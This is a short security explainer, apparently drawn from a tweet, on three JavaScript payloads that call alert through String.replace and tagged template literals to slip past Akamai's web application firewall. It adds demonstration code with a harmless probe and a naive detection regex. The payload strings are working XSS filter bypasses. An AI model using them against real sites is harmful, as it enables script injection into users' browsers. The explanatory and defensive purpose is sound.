Akamai WAF, a widely used web application firewall, has been bypassed with JavaScript payloads that use the replace function in different forms. The bypass combines JavaScript template literals with function-call manipulation: the backtick (`) template-literal syntax and .call applied to the string replace method.

The three example payloads that bypass the WAF are:

'a'.replace.call`1${/./}${alert}`
'a,'.replace`a${alert}`
'a'.replace(/./,alert)

These payloads exploit the way JavaScript evaluates the replace method with regular expressions and template literals to execute the alert function, which could be used for XSS attacks. The bypass method is universal, not limited to a single vulnerability like XSS or SQL injection, as it demonstrates bypassing JavaScript content filters, likely enabling script execution.

This indicates that Akamai WAF's JavaScript content filtering can be circumvented using advanced JavaScript features and syntax, and shows the importance of improving WAF detection for such payloads to prevent client-side code injection and XSS vulnerabilities.
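How each of the three forms ends up invoking the function it is handed, shown with a harmless recording probe in place of alert. This is an added example, not code from the original tweet; makeProbe, the three form* functions and the naive signature in naiveSignatureHits are hypothetical names and say nothing about Akamai's actual rules.

```javascript
// Added example. `probe` stands in for `alert` and only records its arguments.
function makeProbe() {
  const calls = [];
  const probe = (...args) => { calls.push(args); return ''; };
  probe.calls = calls;
  return probe;
}

// 'a'.replace(/./, fn): replace() calls a function replacement once per
// match, passing (matchedText, offset, wholeString).
function formRegexCallback() {
  const probe = makeProbe();
  'a'.replace(/./, probe);
  return probe.calls;
}

// 'a,'.replace`a${fn}`: the tagged template calls replace(strings, fn) with
// strings = ['a', '']. replace() coerces that array to the search string
// "a,", which matches the subject 'a,', so fn is called.
function formTaggedTemplate() {
  const probe = makeProbe();
  'a,'.replace`a${probe}`;
  return probe.calls;
}

// 'a'.replace.call`1${/./}${fn}`: the tag is Function.prototype.call with
// `this` bound to replace, i.e. replace.call(['1','',''], /./, fn).
// The array becomes the subject string "1,," and /./ matches "1".
function formCallTag() {
  const probe = makeProbe();
  'a'.replace.call`1${/./}${probe}`;
  return probe.calls;
}

// Hypothetical naive signature (an assumption for illustration): it looks
// for the sink name followed by "(". In every form the function is passed
// by reference, so the pattern never appears.
function naiveSignatureHits(payloads) {
  return payloads.filter((p) => /alert\s*\(/.test(p)).length;
}

// The three payload strings quoted on this page.
const PAGE_PAYLOADS = [
  "'a'.replace.call`1${/./}${alert}`",
  "'a,'.replace`a${alert}`",
  "'a'.replace(/./,alert)",
];
```

Because the function is never written with call parentheses, matching on the sink name plus "(" misses all three forms; output encoding and a Content Security Policy do not depend on recognising the syntax.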
For more insights, check out the original tweet here: https://twitter.com/Arram_web3/status/1949161180817195091